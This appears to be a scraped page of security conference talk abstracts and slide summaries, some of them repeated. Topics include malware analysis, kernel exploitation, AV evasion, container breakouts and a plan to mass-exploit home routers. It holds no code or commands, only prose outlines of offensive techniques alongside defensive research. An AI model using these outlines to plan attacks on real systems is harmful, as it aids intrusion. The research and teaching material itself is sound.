Michał Wodyński, a Python developer at PGS Software, talked about security best practices at the wroc.py meetup in Wrocław in January 2019.
Acceleration of Statistical Detection of Zero-day Malware in the Memory Dump ... - Igor Korkin
This paper focuses on the anticipatory enhancement of methods of detecting stealth software. Cyber security detection tools are insufficiently powerful to reveal the most recent cyber-attacks which use malware. In this paper, we will present first an idea of the highest stealth malware, as this is the most complicated scenario for detection because it combines both existing anti-forensic techniques together with their potential improvements. Second, we present new detection methods, which are resilient to this hidden prototype. To help solve this detection challenge, we have analyzed Windows memory content using a new method of Shannon Entropy calculation; methods of digital photogrammetry; the Zipf–Mandelbrot law, as well as by disassembling the memory content and analyzing the output. Finally, we present an idea and architecture of the software tool, which uses CUDA-enabled GPU hardware to speed-up memory forensics. All three ideas are currently a work in progress.
This document summarizes a three-part challenge involving cracking a MIPS binary, exploiting a Python/XXE vulnerability in a web application, and decrypting messages from a SecureDrop-like system. The MIPS binary is cracked by inverting its password checking algorithm. The web app is exploited via XXE to retrieve files containing an admin URL and view state details. Python code is modified at runtime to decrypt an AES key and access a "secret.key" file. This key reveals a tarball containing a SecureDrop implementation. A buffer overflow in SecDrop's service is used to run shellcode. Timing attacks via the CPU cache are then used to retrieve the private RSA key and decrypt messages stored by the SecureDrop-
Volatility is an open source memory forensics tool that analyzes RAM dumps to detect malware. It supports Windows, Linux, Mac and Android and uses plugins to parse memory images and extract useful information. Some key things Volatility can do include detecting injected code, unpacked files, hooks, and kernel driver modifications left by malware in memory. It allows analyzing ransomware locked systems, unpacking encrypted files, and dumping executable content of running processes for further reverse engineering.
This document outlines a plan to hack routers by exploiting vulnerabilities. The plan involves deciding targets, finding vulnerabilities in routers like the AirTies RT series, writing exploits in MIPS assembly to achieve remote code execution, writing scripts for mass exploitation, running attacks on targets in Turkey, and analyzing results. Routers are attractive targets because they are directly internet accessible, can control all traffic once compromised, have limited logging capabilities, and rarely receive security updates.
The document discusses developing an exploit from a vulnerability and integrating it into the Metasploit framework. It covers finding a buffer overflow vulnerability in an application called "Free MP3 CD Ripper", using tools like ImmunityDebugger and Mona.py to crash the application and gain control of EIP. It then shows using Mona.py to generate an exploit, testing it works, and submitting it to the Metasploit framework. It also provides an overview of Meterpreter and its capabilities.
This document discusses secure coding practices related to timing attacks, random number generation, and string security. It provides examples of vulnerabilities in Java timing attacks, OpenSSL and .NET random number generation, and recommendations for using cryptographically secure random number generators and constant time comparisons to mitigate timing attacks.
Linux Security APIs and the Chromium Sandbox - Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context.
The Chromium Sandbox is used in the Vivaldi, Brave, Chrome and Opera browsers among others. It has a very platform specific implementation, using the platform APIs available to construct it. In this talk we will describe the requirements of the Chromium Sandbox and go through the steps and APIs used to construct it on Linux.
Hackersuli - Linux game hacking with LD_PRELOAD - hackersuli
This document discusses using LD_PRELOAD and DYLD_INSERT_LIBRARIES to inject code into processes via shared object preloading on Linux and macOS respectively. It provides examples of modifying system calls and injecting code into applications at runtime. It also explains how to compile shared objects for injection and discusses some techniques for preventing injection, such as using setuid/setgid bits.
The document discusses volatility and memory forensics. It covers topics like how volatility works on different operating systems like Linux and Windows, acquiring memory dumps, analyzing memory structures like page tables and processes, dealing with semantic gaps in raw memory, plugin development, and investigating various artifacts in memory related to authentication, passwords, encryption, and applications. The document provides information on memory forensics techniques and how volatility is used as an open-source memory forensics framework.
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh... - CODE BLUE
The document discusses methods for identifying and investigating lateral movement by attackers during security incidents. It describes common tools and techniques used by attackers during different stages of an advanced persistent threat (APT) incident, including initial investigation, internal reconnaissance, spreading infection, and deleting evidence. The document analyzes logs and commands from past APT attacks to identify patterns in attacker behavior that can help with incident response. It notes that default system logs often do not provide enough information, so additional logging of events, processes, and network connections may be needed to fully trace attacker activities within a target network.
If one bug has been found, there are others. One way to uncover "inherited" ... - Positive Hack Days
Speaker: Asuka Nakajima
Reusing source code reduces the cost of software development. However, if the original source code contains a vulnerability, it is carried over into the new application. The speaker will describe an unusual way of detecting "inherited" vulnerabilities in binary files without needing access to the source code or symbol files.
Automated Malware Analysis and Cyber Security Intelligence - Jason Choi
This presentation is an introduction to Cuckoo Sandbox, an automated malware analysis system, and to the intelligence for using this tool, given at the Department of Scientific Criminal Investigation at SungKyunKwan University in Korea.
- The document discusses exploiting unconventional use-after-free (UAF) bugs in the Android kernel perf system to gain root privileges on Android devices.
- It describes two UAF bugs, CVE-2016-6787 and CVE-2017-0403, that are difficult to exploit due to lack of control over freed objects and inability to achieve code execution.
- Novel exploitation techniques are proposed, such as freezing threads to gain time to refill freed objects for CVE-2016-6787 and compromising the pipe subsystem to achieve arbitrary kernel writes for CVE-2017-0403.
This document discusses use-after-free attacks and ways to prevent them. It begins with an introduction to dynamic memory allocation and how freed memory can be reallocated. It then explains how dangling pointers can be used to hijack memory and execute arbitrary code through use-after-free vulnerabilities. Several real-world examples are provided. The document discusses various techniques programmers can use to prevent these attacks, such as smart pointers, immediately nullifying freed pointers, and compiler security checks. It also covers operating system defenses like Control Flow Guard on Windows and AddressSanitizer on Linux. The talk concludes with recommendations on comprehensive mitigations through secure coding practices and system hardening.
Advanced Evasion Techniques by Win32/Gapz - Alex Matrosov
The document discusses advanced evasion techniques used by the Win32/Gapz malware. It describes how Gapz uses droppers, bootkits, and rootkit functionality for stealthy infection. The dropper uses PowerLoader and code injection into explorer.exe to bypass detection. The bootkit modifies the MBR and VBR to load at early boot stages. The rootkit implements hidden storage, process injection, and covert network communication channels.
Industroyer: biggest threat to industrial control systems since Stuxnet by An... - CODE BLUE
Industroyer is the first ever malware specifically designed to attack power grids. This unique and extremely dangerous malware framework was involved in the December 2016 blackout in Ukraine. What sets Industroyer apart from other malware targeting infrastructure, such as BlackEnergy (a.k.a. SandWorm), is its ability to control switches and circuit breakers directly via 4 different industrial communication protocols.
In addition to explaining why Industroyer can be considered the biggest threat to industrial control systems since the infamous Stuxnet worm, we will take a look at the 2016 power outage in the context of the other numerous cyberattacks against Ukrainian critical infrastructure in the recent years.
As the protocols and hardware targeted by Industroyer are employed in power supply infrastructure, transportation control systems, and other critical infrastructure systems, like water and gas, worldwide, the malware can be re-purposed to target vital services in other countries. This discovery should serve as a wake-up call for those responsible for security of these critical systems.
Anton Cherepanov
Anton Cherepanov is currently working at ESET as Senior Malware Researcher; his responsibilities include the analysis of complex threats. He has done extensive research on cyber-attacks in Ukraine. His research has been presented at numerous conferences, including Virus Bulletin, CARO Workshop, PHDays, and ZeroNights. His interests focus on reverse engineering and malware analysis automation.
Róbert Lipovský
Róbert Lipovský is Senior Malware Researcher in ESET’s Security Research Laboratory, with 10 years’ experience with malware research. He is responsible for malware intelligence and analysis and leads the Malware Research team in ESET’s HQ in Bratislava. He is a regular speaker at security conferences, including Black Hat, Virus Bulletin, and CARO. He runs a reverse engineering course at the Slovak University of Technology, his alma mater and the Comenius University. When not bound to a keyboard, he enjoys sports, playing guitar and flying an airplane.
This document provides an overview of modern evasion techniques for bypassing network defenses. It discusses using PowerShell, macros, and C# to generate payloads that can evade detection from antivirus vendors like Palo Alto, Fortinet, Cisco, and Proofpoint. Specific evasion tactics covered include obfuscating payloads, customizing Meterpreter, using Empire instead of Metasploit, modifying templates, and delivering payloads via links instead of attachments. The document demonstrates how to generate custom C# payloads, use PowerShell to bypass defenses, and encrypt payloads with Ebowla. It recommends tools like MSF, Empire, Pupy, Unicorn, and Ebowla for evasion and
"A rootkits writer’s guide to defense" - Michal Purzynski - PROIDEA
Michal will take you on a journey all the way to the ’90s and back, sharing the Mozilla detection framework - a systematic way to detect and hunt down threat actors. Why did we spend hours digging through some old Phrack issues? How does a blue team member approach writing rootkits? What is better - a false negative or a false positive? I will share answers to these questions plus a lot of alerting and evil-doing code.
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ... - PROIDEA
Banking Trojans have been part of the financial cybercrime landscape for over a decade, causing losses measured in billions of dollars. On the flip side, the constant evolution of defenses against this type of malware has forced Trojan operators to adjust to security controls designed to keep them out. As a result, many Trojan operators have either disappeared or considerably narrowed their activity scope, but more interestingly, are using novel techniques to achieve their goals. In this talk, we will present three top malware operators active in the wild and their use of automated scripts to tackle their challenges:
- The notorious Gozi (ISFB) malware used to run its own executable files. Nowadays, it avoids storing malicious payloads on disk and instead writes a PowerShell script to the Windows registry and executes it using a special regex-based run-key.
- Ramnit, a dated foe that focuses on UK banks, encrypts its payload using a Windows API function with a device-unique key. On every system reboot, it decrypts the payload in memory and runs it with a Visual Basic script that runs PowerShell. This allows Ramnit to avoid running a detectable executable file as it used to do in the past.
- BackSwap is a new banking Trojan that attacks financial institutions in Spain. Its dropper is a JavaScript Encoded (JSE) file. When decoded, the dropper results in a 30k lines-of-code script which downloads a binary sample from a remote Command-and-Control server.
Together with our audience, we will walk through the research process and share our findings along with our (sometimes) quick-and-dirty solutions. We aim to enhance our participants’ knowledge of today’s bankers and help them get deeper into current-day scripting-related techniques cybercriminals use.
Speaker: Ivan Yolkin
The fast-track speaker will talk about the experience of rolling out a Static Analysis Security Tool at QIWI and about the difficulties the developers ran into. Write workarounds or refactor the code? What to do when the client's and the developer's opinions diverge? He will say how many lines of code had to be read and written before and after the scanner was launched, and offer a brief overview of the vulnerabilities that were found and those that were missed.
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen - PROIDEA
Chi-en Shen (Ashley) is a security researcher at FireEye, where she focuses on threat intelligence research. She specializes in threat hunting, malware analysis, reverse engineering, and targeted attacks research. Prior to FireEye, Ashley helped found Team T5, a threat research security company where she also works as a threat analyst. For supporting women in InfoSec, Ashley co-founded “HITCON GIRLS” – the first security community for women in Taiwan. Ashley is also a regular speaker at global security conferences, including Black Hat Europe, Black Hat Asia, FIRST, HITB GSEC, CODE BLUE, Troopers, HITCON and VXCON. Ashley also serves as a member of the Black Hat Asia review board where she evaluates research for briefings and training.
[CB16] DeathNote of Microsoft Windows Kernel by Peter Hlavaty & Jin Long - CODE BLUE
Recently our team researched various ntos subsystem attack vectors, and we will present one of the outputs in our talk. DeathNote is our internal code name for this component, which resides in the Microsoft Windows kernel, hiding behind different interfaces and exposed to the user in different ways.
What can go bad with it?
Basically two kinds of problems. One is syscall handling via direct user interaction. We will describe how to obtain a basic understanding of what's going on, how it interacts with other components and what its purpose is. With that knowledge we will dig deeper into how to make more complex fuzzing logic to cause enough chaos that it ends up in unexpected behaviors in the Windows kernel, and demonstrate some of them.
As for the second, as the title hints, this module does a bit of data parsing, so we will dive deep into its internals, pointing out some available materials, and move on to reverse engineered structures and internal mechanisms. We will show how some tricks can lead to various results, and how a structured approach can expose more problems than expected.
--- Peter Hlavaty
Peter is a Lead for Windows Kernel Research at Keen Lab of Tencent (originally known as KEEN Team), with a primary focus on vulnerability discovery and development of novel exploitation techniques. He has presented his research at various conferences such as Recon, Syscan, ZeroNights, NoSuchCon and others. Prior to Keen, Peter was an AV (ESET) guy; with 4+ years of experience in that field, he switched to offensive software security research focused on Windows and Linux kernel architectures. Pwnie nominee and pwn2own 2015 & 2016 (MoP) winner, occasionally a CTF player. Besides the software security field, he does his best as a wushu player as well.
--- Jin Long 金龙
Tencent Keen Security Lab researcher, 6 years programming experience, 4 years security experience. Former TrendMicro employee, now focused on Windows security research at Keen Security Lab. Pwn2Own 2016 winner (Master of Pwn by final Edge to SYSTEM escape).
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by... - CODE BLUE
In this talk, we are going to disclose two unconventional Use-after-free kernel bugs on Android we found last year, and introduce the new techniques we used to make these exploits 100% reliable.
The first bug is CVE-2017-0403, which we used to gain root privilege on almost all devices shipped with 3.10 or earlier Linux kernel last year. So far more than 14 million users have successfully rooted their smartphones with this exploit. With this vulnerability, an attacker can only overwrite the freed object at a fixed offset with a pointer to the object itself. Achieving kernel code execution with this bug can be very challenging. To solve the problem, we propose a new method which uses iovec to re-fill the freed object and compromises the pipe subsystem in the kernel. In this way we can convert this unusual memory corruption into arbitrary kernel memory overwriting.
The second bug is CVE-2016-6787. The bug is a UAF due to a race condition; it may corrupt a critical kernel structure and lead to a kernel crash when the scheduler switches context back to the attacker's process. So we'll introduce a way to freeze the attacker's process soon after the UAF happens, stop the kernel from crashing, and make the exploit reliable.
In summary, this presentation gives out the new techniques of exploiting use-after-free bugs we just found in the Android kernel. The ideas of exploitation are fresh, and the details of the bugs have also never been discussed before.
Malware analysis - What to learn from your invaders - Tazdrumm3r
This document outlines a presentation on malware analysis. It discusses analyzing samples of phishing emails to learn about malware behavior. The speaker will demonstrate using tools like VirtualBox, Remnux, Regshot and Wireshark to perform static and behavioral analysis of malware samples. Network and host-based analysis will be used to observe a sample's network activity and changes it makes to the system. Resources for continuing malware research are also provided.
The document discusses crash-resistance in software and how it can be exploited. It explains how exceptions generated by crashes in callback functions in Windows are handled, allowing programs to continue running despite crashes. This crash-resistance property is demonstrated through a simple example program. The document then discusses how crash-resistant probing of memory can be used to bypass defenses like ASLR by scanning process memory from a web worker without crashing the browser. Techniques like heap spraying and type confusion are used to craft fake objects and scan memory in a crash-resistant manner to discover information like the TEB and DLL base addresses.
The document describes a simulated hacking game scenario involving a compromised POS terminal infected with malware. It details the components of the botnet architecture including bot nodes, command and control infrastructure, and social media propagation. Diagrams show the network layout and communication channels. The document also examines the bot's components, capabilities, and protection mechanisms such as bytecode encryption and anti-debugging techniques. Hints are provided to help players progress in the game by bypassing defenses and achieving objectives over multiple days.
Detection index learning based on cyber threat intelligence and its applicati... - CODE BLUE
As cyber attacks become more sophisticated, sharing cyber threat intelligence (CTI) and considering countermeasures in advance is becoming more important. However, the IP addresses and domains included in CTI as detection indices are disposed of (changed or removed) by attackers in short cycles. As a countermeasure on the defender side, we are moving towards increasing the cost for attackers by improving the sharing speed of CTI, and we receive large amounts of CTI every day. As a result, the CTI itself is also disposable in a short cycle. In this report, we built a detection index learning method based on CTI that is accumulated day by day, implemented a detection index learning engine that learns how detection indices are used by attackers, and report on the learning result. We also report on the possibility of reconstructing and combining the result of learning the detection index and applying it to mid- to long-term advanced protection in combination with another data source.
Fantastic Red Team Attacks and How to Find Them - Ross Wolf
Presented at Black Hat 2019
https://www.blackhat.com/us-19/briefings/schedule/index.html#fantastic-red-team-attacks-and-how-to-find-them-16540
Casey Smith (Red Canary)
Ross Wolf (Endgame)
bit.ly/fantastic19
Abstract:
Red team testing in organizations over the last year has shown a dramatic increase in detections mapped to MITRE ATT&CK™ across Windows, Linux and macOS. However, many organizations continue to miss several key techniques that, unsurprisingly, often blend in with day-to-day user operations. One example includes Trusted Developer Utilities which can be readily available on standard user endpoints, not just developer workstations, and such applications allow for code execution. Also, XSL Script processing can be used as an attack vector as there are a number of trusted utilities that can consume and execute scripts via XSL. And finally, in addition to these techniques, trusted .NET default binaries are known to allow unauthorized execution as well, these include tools like InstallUtil, Regsvcs and AddInProcess. Specific techniques, coupled with procedural difficulties within a team, such as alert fatigue and lack of understanding with environmental norms, make reliable detection of these events near impossible.
This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events.
Additionally, we introduce and demonstrate the open-sourced Event Query Language for creating high signal-to-noise analytics that close these prevalent behavioral gaps. EQL is event agnostic and can be used to craft analytics that readily link evidence across long sequences of log data. In a live demonstration, we showcase powerful but easy to craft analytics that catch adversarial behavior most commonly missed in organizations today.
The document provides security tips and best practices for building web applications in Go. It discusses Go's type system, concurrency model, and standard library features. It also summarizes common vulnerabilities like SQL injection and XSS, and recommends using parameterized queries and HTML escaping to prevent them. Finally, it highlights tools like Gorilla and Gin web frameworks, and techniques like rate limiting and secure cookies to build secure Go applications.
The document discusses volatility and memory forensics. It covers topics like how volatility works on different operating systems like Linux and Windows, acquiring memory dumps, analyzing memory structures like page tables and processes, dealing with semantic gaps in raw memory, plugin development, and investigating various artifacts in memory related to authentication, passwords, encryption, and applications. The document provides information on memory forensics techniques and how volatility is used as an open-source memory forensics framework.
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...CODE BLUE
The document discusses methods for identifying and investigating lateral movement by attackers during security incidents. It describes common tools and techniques used by attackers during different stages of an advanced persistent threat (APT) incident, including initial investigation, internal reconnaissance, spreading infection, and deleting evidence. The document analyzes logs and commands from past APT attacks to identify patterns in attacker behavior that can help with incident response. It notes that default system logs often do not provide enough information, so additional logging of events, processes, and network connections may be needed to fully trace attacker activities within a target network.
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...Positive Hack Days
Ведущий: Асука Накадзима (Asuka Nakajima)
Практика повторного использования исходного кода позволяет сократить расходы на разработку программного обеспечения. Тем не менее, если в оригинальном исходном коде кроется уязвимость, она будет перенесена и в новое приложение. Докладчик расскажет о необычном способе обнаружения «наследуемых» уязвимостей в бинарных файлах без необходимости обращаться к исходному коду или символьным файлам.
Automated Malware Analysis and Cyber Security IntelligenceJason Choi
This presentation is an introduction to Cuckoo Sandbox, an automated a malware analysis system, and Intelligence to use this tool, at Department of Scientific Criminal Investigation in SungKyunKwan University in Korea.
- The document discusses exploiting unconventional use-after-free (UAF) bugs in the Android kernel perf system to gain root privileges on Android devices.
- It describes two UAF bugs, CVE-2016-6787 and CVE-2017-0403, that are difficult to exploit due to lack of control over freed objects and inability to achieve code execution.
- Novel exploitation techniques are proposed, such as freezing threads to gain time to refill freed objects for CVE-2016-6787 and compromising the pipe subsystem to achieve arbitrary kernel writes for CVE-2017-0403.
This document discusses use-after-free attacks and ways to prevent them. It begins with an introduction to dynamic memory allocation and how freed memory can be reallocated. It then explains how dangling pointers can be used to hijack memory and execute arbitrary code through use-after-free vulnerabilities. Several real-world examples are provided. The document discusses various techniques programmers can use to prevent these attacks, such as smart pointers, immediately nullifying freed pointers, and compiler security checks. It also covers operating system defenses like Control Flow Guard on Windows and AddressSanitizer on Linux. The talk concludes with recommendations on comprehensive mitigations through secure coding practices and system hardening.
Advanced Evasion Techniques by Win32/Gapz - Alex Matrosov
The document discusses advanced evasion techniques used by the Win32/Gapz malware. It describes how Gapz uses droppers, bootkits, and rootkit functionality for stealthy infection. The dropper uses PowerLoader and code injection into explorer.exe to bypass detection. The bootkit modifies the MBR and VBR to load at early boot stages. The rootkit implements hidden storage, process injection, and covert network communication channels.
Industroyer: biggest threat to industrial control systems since Stuxnet by An... - CODE BLUE
Industroyer is the first ever malware specifically designed to attack power grids. This unique and extremely dangerous malware framework was involved in the December 2016 blackout in Ukraine. What sets Industroyer apart from other malware targeting infrastructure, such as BlackEnergy (a.k.a. SandWorm), is its ability to control switches and circuit breakers directly via 4 different industrial communication protocols.
In addition to explaining why Industroyer can be considered the biggest threat to industrial control systems since the infamous Stuxnet worm, we will take a look at the 2016 power outage in the context of the other numerous cyberattacks against Ukrainian critical infrastructure in the recent years.
As the protocols and hardware targeted by Industroyer are employed in power supply infrastructure, transportation control systems, and other critical infrastructure systems, like water and gas, worldwide, the malware can be re-purposed to target vital services in other countries. This discovery should serve as a wake-up call for those responsible for security of these critical systems.
Anton Cherepanov
Anton Cherepanov is currently working at ESET as Senior Malware Researcher; his responsibilities include the analysis of complex threats. He has done extensive research on cyber-attacks in Ukraine. His research was presented at numerous conferences, including Virus Bulletin, CARO Workshop, PHDays, and ZeroNights. His interests focus on reverse engineering and malware analysis automation.
Róbert Lipovský
Róbert Lipovský is Senior Malware Researcher in ESET’s Security Research Laboratory, with 10 years’ experience with malware research. He is responsible for malware intelligence and analysis and leads the Malware Research team in ESET’s HQ in Bratislava. He is a regular speaker at security conferences, including Black Hat, Virus Bulletin, and CARO. He runs a reverse engineering course at the Slovak University of Technology, his alma mater and the Comenius University. When not bound to a keyboard, he enjoys sports, playing guitar and flying an airplane.
This document provides an overview of modern evasion techniques for bypassing network defenses. It discusses using PowerShell, macros, and C# to generate payloads that can evade detection from antivirus vendors like Palo Alto, Fortinet, Cisco, and Proofpoint. Specific evasion tactics covered include obfuscating payloads, customizing Meterpreter, using Empire instead of Metasploit, modifying templates, and delivering payloads via links instead of attachments. The document demonstrates how to generate custom C# payloads, use PowerShell to bypass defenses, and encrypt payloads with Ebowla. It recommends tools like MSF, Empire, Pupy, Unicorn, and Ebowla for evasion and
"A rootkits writer’s guide to defense" - Michal Purzynski - PROIDEA
Michal will take you on a journey all the way to 90’s and back, sharing the Mozilla detection framework - a systematic way to detect and hunt down threat actors. Why did we spend hours digging through some old Phrack issues? How does a blue team's member approach writing rootkits? What is better - a fail negative or a false positive? I will share answers to these questions plus a lot of alerting and evil-doing code.
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ... - PROIDEA
Banking Trojans have been part of the financial cybercrime landscape for over a decade, causing losses measured in billions of dollars. On the flip side, the constant evolution of defenses against this type of malware has forced Trojan operators to adjust to security controls designed to keep them out. As a result, many Trojan operators have either disappeared or considerably narrowed their activity scope, but more interestingly, are using novel techniques to achieve their goals. In this talk, we will present three top malware operators active in the wild and their use of automated scripts to tackle their challenges: The notorious Gozi (ISFB) malware used to run its own executable files. Nowadays, it avoids storing malicious payloads on disk and instead, writes a Powershell script to the Windows registry and executes it using a special regex-based run-key. Ramnit, a dated foe that focuses on UK banks, encrypts its payload using a Windows API function with a device-unique key. In every system reboot, it decrypts the payload in-memory and runs it with a Visual Basic script that runs Powershell. This allows Ramnit to avoid running a detectable, executable file as it used to do in the past. BackSwap is a new banking Trojan that attacks financial institutions in Spain. Its dropper is a JavaScript Encoded (JSE) file. When decoded, the dropper results in a 30k lines-of-code script which downloads a binary sample from a remote Command-and-Control server. Together with our audience, we will walk through the research process and share our findings along with our (sometimes) quick-and-dirty solutions. We aim to enhance our participants’ knowledge of today’s bankers and help them get deeper into current-day scripting-related techniques cybercriminals use.
Presenter: Ivan Yolkin
The fast-track presenter will talk about the experience of rolling out a Static Analysis Security Tool at QIWI and about the difficulties the developers ran into. Write workarounds or refactor the code? What to do when the client's and the developer's opinions diverge? He will tell how many lines of code had to be read and written before and after launching the scanner, and will offer a brief overview of the vulnerabilities that were found and missed.
"Into the Fog The Return of ICEFOG APT" - Chi-en (Ashley) Shen - PROIDEA
Chi-en Shen (Ashley) is a security researcher at FireEye, where she focuses on threat intelligence research. She specializes in threat hunting, malware analysis, reverse engineering, and targeted attacks research. Prior to FireEye, Ashley helped found Team T5, a threat research security company where she also works as a threat analyst. For supporting women in InfoSec, Ashley co-founded “HITCON GIRLS” – the first security community for women in Taiwan. Ashley is also a regular speaker at global security conferences, including Black Hat Europe, Black Hat Asia, FIRST, HITB GSEC, CODE BLUE, Troopers, HITCON and VXCON. Ashley also serves as a member of the Black Hat Asia review board where she evaluates research for briefings and training.
[CB16] DeathNote of Microsoft Windows Kernel by Peter Hlavaty & Jin Long - CODE BLUE
Recently our team researched various ntos subsystem attack vectors, and we will present one of the outputs in our talk. DeathNote is our internal code name for this component, which resides in the Microsoft Windows kernel, hiding behind different interfaces and exposed to the user in different ways.
What can go bad with it?
Basically two kinds of problems. One is syscall handling via direct user interaction. We will describe how to obtain a basic understanding of what's going on, how it interacts with other components and what its purpose is. With that knowledge we will dig deeper into how to build more complex fuzzing logic to cause enough chaos that it will end up in unexpected behaviors in the Windows kernel, and demonstrate some of them.
As for the second, as the title hints, this module does a bit of data parsing, so we will dive deep into the internals, pointing out some available materials, and move on to reverse engineered structures and internal mechanisms. We will show how some tricks can produce various results, and how a structured approach can expose more problems than expected.
--- Peter Hlavaty
Peter is a Lead for Windows Kernel Research at Keen Lab of Tencent (originally known as KEEN Team). With primary focus on vulnerability discovery and novel exploitation techniques dev. Presenting his research on various conferences such as Recon, Syscan, ZeroNights, NoSuchCon and others. Prior to Keen, Peter was AV (ESET) guy, with 4+ years of experience in that field switched to offensive software security research focused on windows and linux kernel architectures. Pwnie nominee and pwn2own 2015 & 2016(MoP) winner, occasionally CTF player. Besides software security field, doing his best as wushu player as well.
--- Jin Long 金龙
Tencent Keen Security Lab researcher, 6 years programming experience, 4 years security experience. Former TrendMicro employee, now focused on Windows security research at Keen Security Lab. Pwn2Own 2016 winner (Master of Pwn by final Edge to SYSTEM escape).
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by... - CODE BLUE
In this talk, we are going to disclose two unconventional Use-after-free kernel bugs on Android we found last year, and introduce the new techniques we used to make these exploits 100% reliable.
The first bug is CVE-2017-0403, which we used to gain root privilege on almost all devices shipped with 3.10 or earlier Linux kernel last year. So far more than 14 million users have successfully rooted their smartphones with this exploit. With this vulnerability, an attacker can only overwrite the freed object at a fixed offset with a pointer to the object itself. How to achieve kernel code execution with this bug can be very challenging. To solve the problem, we propose a new method which uses iovec to re-fill the freed object and compromises the pipe subsystem in the kernel. In this way we can convert this unusual memory corruption into arbitrary kernel memory overwriting.
The second bug is CVE-2016-6787. The bug is a UAF due to a race condition; it may corrupt a critical kernel structure and lead to a kernel crash when the scheduler switches context back to the attacker's process. So we'll introduce a way to freeze the attacker's process soon after the UAF happens, stop the kernel from crashing, and make the exploit reliable.
In summary, this presentation gives out the new techniques of exploiting use-after-free bugs we just found in Android kernel. The ideas of exploitation are fresh, detail of bugs is also never discussed before.
Malware analysis - What to learn from your invaders - Tazdrumm3r
This document outlines a presentation on malware analysis. It discusses analyzing samples of phishing emails to learn about malware behavior. The speaker will demonstrate using tools like VirtualBox, Remnux, Regshot and Wireshark to perform static and behavioral analysis of malware samples. Network and host-based analysis will be used to observe a sample's network activity and changes it makes to the system. Resources for continuing malware research are also provided.
The document discusses crash-resistance in software and how it can be exploited. It explains how exceptions generated by crashes in callback functions in Windows are handled, allowing programs to continue running despite crashes. This crash-resistance property is demonstrated through a simple example program. The document then discusses how crash-resistant probing of memory can be used to bypass defenses like ASLR by scanning process memory from a web worker without crashing the browser. Techniques like heap spraying and type confusion are used to craft fake objects and scan memory in a crash-resistant manner to discover information like the TEB and DLL base addresses.
The document describes a simulated hacking game scenario involving a compromised POS terminal infected with malware. It details the components of the botnet architecture including bot nodes, command and control infrastructure, and social media propagation. Diagrams show the network layout and communication channels. The document also examines the bot's components, capabilities, and protection mechanisms such as bytecode encryption and anti-debugging techniques. Hints are provided to help players progress in the game by bypassing defenses and achieving objectives over multiple days.
Detection index learning based on cyber threat intelligence and its applicati... - CODE BLUE
While the importance of sharing cyber threat intelligence (CTI) and considering countermeasures in advance is increasing as cyber attacks become more sophisticated, the IP addresses and domains included in CTI as detection indices are disposed of (changed or made to disappear) by attackers in short cycles. As a countermeasure on the defender side, we are moving towards increasing the cost to attackers by improving the sharing speed of CTI, and we receive large amounts of CTI every day. As a result, the situation is such that the CTI is also disposable in a short cycle. In this report, we built a detection index learning method based on CTI that is accumulated day by day, implemented a detection index learning engine that learns how detection indices are used by attackers, and report on the learning result. We also report on the possibility of reconstructing and combining the result of learning the detection index and applying it to mid- to long-term advanced protection in combination with another data source.
Fantastic Red Team Attacks and How to Find Them - Ross Wolf
Presented at Black Hat 2019
https://www.blackhat.com/us-19/briefings/schedule/index.html#fantastic-red-team-attacks-and-how-to-find-them-16540
Casey Smith (Red Canary)
Ross Wolf (Endgame)
bit.ly/fantastic19
Abstract:
Red team testing in organizations over the last year has shown a dramatic increase in detections mapped to MITRE ATT&CK™ across Windows, Linux and macOS. However, many organizations continue to miss several key techniques that, unsurprisingly, often blend in with day-to-day user operations. One example includes Trusted Developer Utilities which can be readily available on standard user endpoints, not just developer workstations, and such applications allow for code execution. Also, XSL Script processing can be used as an attack vector as there are a number of trusted utilities that can consume and execute scripts via XSL. And finally, in addition to these techniques, trusted .NET default binaries are known to allow unauthorized execution as well, these include tools like InstallUtil, Regsvcs and AddInProcess. Specific techniques, coupled with procedural difficulties within a team, such as alert fatigue and lack of understanding with environmental norms, make reliable detection of these events near impossible.
This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events.
Additionally, we introduce and demonstrate the open-sourced Event Query Language for creating high signal-to-noise analytics that close these prevalent behavioral gaps. EQL is event agnostic and can be used to craft analytics that readily link evidence across long sequences of log data. In a live demonstration, we showcase powerful but easy to craft analytics that catch adversarial behavior most commonly missed in organizations today.
The document provides security tips and best practices for building web applications in Go. It discusses Go's type system, concurrency model, and standard library features. It also summarizes common vulnerabilities like SQL injection and XSS, and recommends using parameterized queries and HTML escaping to prevent them. Finally, it highlights tools like Gorilla and Gin web frameworks, and techniques like rate limiting and secure cookies to build secure Go applications.
This document discusses container security and analyzes potential vulnerabilities in Docker containers. It describes how containers may not fully isolate processes and how an attacker could escape a container to access the host machine via avenues like privileged containers, kernel exploits, or Docker socket access. It provides examples of container breakouts using these methods and emphasizes the importance of security features like seccomp, AppArmor, cgroups to restrict containers. The document encourages readers to apply security best practices like the Docker Bench tool to harden containers.
Chromium Sandbox on Linux (BlackHoodie 2018) - Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
This document discusses different tools that can be used to generate random test data and load test applications, including Tsung, ScalaCheck, and Gatling. It provides an overview of how each tool works and how they can be combined. Tsung is an open source load testing tool that can simulate users and load test applications. ScalaCheck is a property-based testing library that can generate random test data. Gatling is an open source load testing framework that supports load testing applications using scenarios and simulated users. It discusses how ScalaCheck can be used to generate random test data and how that data can be fed into Gatling load tests using feeders.
idsecconf2023 - Satria Ady Pradana - Launch into the Stratus-phere Adversary ... - idsecconf
